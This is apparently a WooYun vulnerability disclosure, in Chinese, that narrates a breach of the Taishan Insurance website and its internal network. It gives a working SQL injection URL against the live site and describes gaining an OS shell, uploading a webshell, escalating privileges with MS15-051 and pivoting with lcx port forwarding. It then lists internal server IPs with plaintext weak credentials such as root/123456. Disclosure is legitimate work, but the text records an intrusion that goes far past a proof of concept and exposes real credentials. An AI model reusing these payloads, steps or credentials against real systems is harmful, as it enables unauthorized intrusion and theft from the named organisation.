WooYun.org

问题出在泰山保险主站：http://www.taishanpic.com
多处sql注入：http://www.taishanpic.com/TSHBX/PortalContentInfo.aspx?ContentID=dee75e3b-e2e0-40bc-9de9-da16adf96726
payload：

http://www.taishanpic.com/tshbx/PortalContentInfo.aspx?ContentID=8298' UNION ALL SELECT NULL,NULL,NULL,db_name(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

并且注入点为dba权限，直接os-shell成功，但是查看了一下ip为内网地址

Ethernet adapter 本地连接:\r
\r
   Connection-specific DNS Suffix  . : \r
   Description . . . . . . . . . . . : Intel(R) 82575EB Gigabit Network Connection\r
   Physical Address. . . . . . . . . : 00-30-48-BF-B1-06\r
   DHCP Enabled. . . . . . . . . . . : No\r
   IP Address. . . . . . . . . . . . : 10.1.5.1\r
   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r
   Default Gateway . . . . . . . . . : 10.1.5.254\r
   DNS Servers . . . . . . . . . . . : 10.1.2.1\r
                                       10.1.2.2\r

所以这个地方必须得拿到shell才行。先读取iis的配置文件metabase.xml，很奇怪，没有找到网站路径。没办法只能利用dir指令去读盘，发现了好几处疑似网站目录，但是写成功后，无法访问成功，并且这几处目录里的文件有的在网站上可以访问，有的却不能访问，觉得很奇怪，终于在admin目录下发现了下面的一些文件，有的可以在网站目录下未授权访问

访问http://www.taishanpic.com/admin/ImportBasicData.aspx，发现可以上传文件

这里利用burp抓包上传后，会返回上传文件的物理路径

返回的物理路径在之前读盘时是不存在的，终于明白了这是站库分离的，但是数据库上有网站目录的一些备份(还是很幸运)，拿到shell
http://www.taishanpic.com/PublicForm/attachment/UploadExcels/a6a919f1-e642-41df-a796-5b4bf69c8792.aspx （Seayace）
看了一下服务器版本win server 2008，直接上ms15-051提权成功，这个也是内网的ip,并且网段不同

lcx将端口转发出来，连上

先读取了本机管理员的密码，加到hscan的字典库里，进行扫描

多个ftp，服务器弱口令,由于太多以下只给出几个示例：
ftp://10.1.3.14/ root 123456

ftp://10.1.3.120 oracle oracle

由于站库分离，数据库的那个服务器直接拿下
数据库服务器：10.1.5.1

ICBC控件服务器：192.68.1.20 （弱口令）

服务器：10.1.3.119 （弱口令）